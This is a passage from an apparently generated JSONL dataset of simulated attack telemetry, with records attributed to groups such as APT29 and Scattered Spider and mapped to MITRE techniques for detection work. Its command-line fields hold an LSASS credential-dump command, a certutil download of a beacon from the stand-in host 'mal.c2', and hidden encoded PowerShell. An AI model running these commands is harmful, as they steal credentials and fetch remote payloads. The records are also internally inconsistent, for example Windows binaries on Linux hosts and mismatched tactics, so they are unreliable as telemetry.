SpiderT1484.001"},"network":{"domain":"github.com","dst_ip":"1.182.172.82","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-07-20T12:49:16.000Z","user":{"name":"i-17ur3lixsnpi","sid":"S-1-5-21-422458302-224669019-6358"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Persistence","Execution"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20261012T054406000Z_0006097","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.234.198.61","name":"APP-WEB-WV0OFJD1LE","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6097Volt TyphoonT1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.123.160.39","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-08-23T15:50:45.000Z","user":{"name":"i-on2la42x2164","sid":"S-1-5-21-257433398-533620405-9974"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Command and Control"],"technique_id":"T1071.001"},"event_id":"evt_apt29_20250828T091407000Z_0006099","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.96.207.218","name":"AZURE-VM-MH6JBVFM63","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6099APT29T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.191.187.203","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3195 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-10-22T20:31:15.000Z","user":{"name":"svc_rmnqkmlwyxja","sid":"S-1-5-21-593430462-612956472-7312"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Credential Access"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20250914T085923000Z_0006101","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.196.11.177","name":"APP-WEB-3FAB9AJ7HC","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6101Lapsus$T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.102.250.141","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-07-05T22:28:13.000Z","user":{"name":"CORP\\myjc7w3ln5qa","sid":"S-1-5-21-816071597-622570353-3374"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Collection"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20251224T122404000Z_0006103","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.161.116.79","name":"WIN-FIN-SRV-UV75ZFZ36N","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6103APT29T1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.43.250.199","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3063 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-09-09T03:01:28.000Z","user":{"name":"svc_qmgbcy300oc2","sid":"S-1-5-21-265849189-559607513-6938"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Exfiltration","Defense Evasion"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20251004T065716000Z_0006105","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.195.212.193","name":"AZURE-VM-LHO4VS3UX5","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6105Volt TyphoonT1570"},"network":{"domain":"github.com","dst_ip":"1.158.19.203","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-09-25T13:35:44.000Z","user":{"name":"azuread\\c5mo4ckrdd67","sid":"S-1-5-21-504801973-412727306-2311"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Collection","Exfiltration","Discovery"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20260323T175241000Z_0006107","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.27.9.17","name":"WIN-FIN-SRV-9L16YJB10K","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6107Scattered SpiderT1546.003"},"network":{"domain":"github.com","dst_ip":"1.170.26.99","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3581 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-12-03T20:17:58.000Z","user":{"name":"azuread\\4bx8t00b1hwf","sid":"S-1-5-21-653322722-701679960-7790"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Discovery"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20260109T005515000Z_0006109","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.65.69.213","name":"WIN-FIN-SRV-E02DJ226NY","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6109APT29T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.22.24.191","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-24T06:35:19.000Z","user":{"name":"i-cik8r3zdqb6r","sid":"S-1-5-21-243444278-211270580-4129"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Lateral Movement","Reconnaissance"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20260612T232653000Z_0006111","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.80.118.32","name":"EC2-INST-ETY4OMRCPS","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6111APT29T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.147.250.190","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-10-04T07:51:12.000Z","user":{"name":"i-akpaxmgou4z3","sid":"S-1-5-21-489410903-356971282-1413"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Impact","Privilege Escalation"],"technique_id":"T1531"},"event_id":"evt_scatteredspider_20260409T232526000Z_0006113","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.146.108.78","name":"DB-ORACLE-3AESUR31ME","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6113Scattered SpiderT1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.88.95.246","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-10-24T11:12:50.000Z","user":{"name":"i-rvz2r7nfdf7q","sid":"S-1-5-21-677021447-483604212-6677"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation","Credential Access","Command and Control"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20260429T014254000Z_0006115","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.132.164.23","name":"IAM-ROLE-YVHMR9HIP2","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6115Scattered SpiderT1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.154.239.19","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2569 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-06-30T07:28:20.000Z","user":{"name":"arn:aws:iam::tk83drbkq5k7","sid":"S-1-5-21-427265329-439887111-3232"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Lateral Movement","Privilege Escalation","Reconnaissance"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20251220T051404000Z_0006117","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.62.169.222","name":"DB-ORACLE-I18SBLQMAP","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6117APT41T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.8.245.225","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-04-19T22:39:55.000Z","user":{"name":"azuread\\3qq0fktqtctm","sid":"S-1-5-21-630101519-936775223-6607"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access","Command and Control","Exfiltration"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20250703T210806000Z_0006119","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.66.9.149","name":"IAM-ROLE-N5K2RVF1J4","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6119Lapsus$T1098.004"},"network":{"domain":"github.com","dst_ip":"1.174.95.111","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-01-08T12:28:20.000Z","user":{"name":"CORP\\1fmn198j7j0e","sid":"S-1-5-21-245572494-103850711-3864"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Defense Evasion","Credential Access","Exfiltration"],"technique_id":"T1059.001"},"event_id":"evt_apt41_20250826T160539000Z_0006121","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.208.216.243","name":"AZURE-VM-2IEVJTQ4TV","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6121APT41T1059.001"},"network":{"domain":"github.com","dst_ip":"1.72.88.199","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-12-14T22:01:24.000Z","user":{"name":"svc_p0mb00w9j0sx","sid":"S-1-5-21-847231520-398447612-1165"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Collection","Exfiltration"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20261026T165134000Z_0006123","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.97.47.129","name":"APP-WEB-FVHC2DK9EW","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6123UNC4841T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.114.63.100","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-01-12T00:18:47.000Z","user":{"name":"i-018kp2bx8tbi","sid":"S-1-5-21-180736673-785952445-1973"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20261024T164039000Z_0006125","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.78.45.166","name":"EC2-INST-WMYHZWM3NP","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6125Volt TyphoonT1021.006"},"network":{"domain":"github.com","dst_ip":"1.24.158.71","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3360 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-11-13T08:20:51.000Z","user":{"name":"arn:aws:iam::ijdyufzgb5jj","sid":"S-1-5-21-533810422-920109828-3413"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Discovery","Lateral Movement","Privilege Escalation"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20261218T035749000Z_0006127","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.207.130.184","name":"APP-WEB-GWMB9UODEB","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6127APT29T1484.001"},"network":{"domain":"github.com","dst_ip":"1.28.15.162","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 901 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-05-24T03:59:41.000Z","user":{"name":"i-6denroy2njeb","sid":"S-1-5-21-676794667-102863883-9234"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Execution"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20250216T223231000Z_0006129","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.36.34.55","name":"IAM-ROLE-X0LTR7QHLR","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6129Scattered SpiderT1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.91.76.20","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1529 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-07-10T09:32:09.000Z","user":{"name":"i-p3rb6776wyth","sid":"S-1-5-21-350124215-859619940-2206"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Impact"],"technique_id":"T1021.006"},"event_id":"evt_apt41_20250807T181938000Z_0006131","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.232.29.108","name":"AZURE-VM-8RF4CT2YEU","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6131APT41T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.1.184.212","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2449 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-05-13T19:55:32.000Z","user":{"name":"azuread\\souvgdugm2wt","sid":"S-1-5-21-532275008-596021078-3714"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1531 using fileless technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Impact","Discovery"],"technique_id":"T1531"},"event_id":"evt_lapsus_20260701T045510000Z_0006133","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.58.69.20","name":"WIN-FIN-SRV-TA2QW5GX8E","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6133Lapsus$T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.149.131.178","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-12-03T08:26:54.000Z","user":{"name":"arn:aws:iam::sy1y8oi3wjjd","sid":"S-1-5-21-210642830-655145761-1917"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Privilege Escalation","Reconnaissance","Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_apt29_20250331T202352000Z_0006135","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.59.232.10","name":"EC2-INST-IPOL7X6JRK","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6135APT29T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.141.214.166","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 737 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-01-25T00:10:11.000Z","user":{"name":"azuread\\2i7z0yt9surx","sid":"S-1-5-21-394470838-974605323-3269"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Defense Evasion","Command and Control","Execution"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20261231T083814000Z_0006137","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.102.29.10","name":"WIN-FIN-SRV-M2G4PLEGO9","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6137APT29T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.105.190.188","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3193 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-01-18T05:33:37.000Z","user":{"name":"arn:aws:iam::mi93ht37ysja","sid":"S-1-5-21-702296301-198258270-8566"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Command and Control","Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_scatteredspider_20261104T171120000Z_0006139","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.196.126.215","name":"WIN-FIN-SRV-MCA61X7VZ4","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6139Scattered SpiderT1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.23.188.166","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-04T20:35:43.000Z","user":{"name":"CORP\\0bsnzuacp4pm","sid":"S-1-5-21-741675562-335429483-3869"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Privilege Escalation","Reconnaissance"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20260702T105516000Z_0006141","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.73.210.201","name":"IAM-ROLE-VHKY20UA2B","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6141FIN7T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.177.227.217","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-12-18T18:25:05.000Z","user":{"name":"i-aux8ujjk2aks","sid":"S-1-5-21-311082239-258452668-4334"}} |
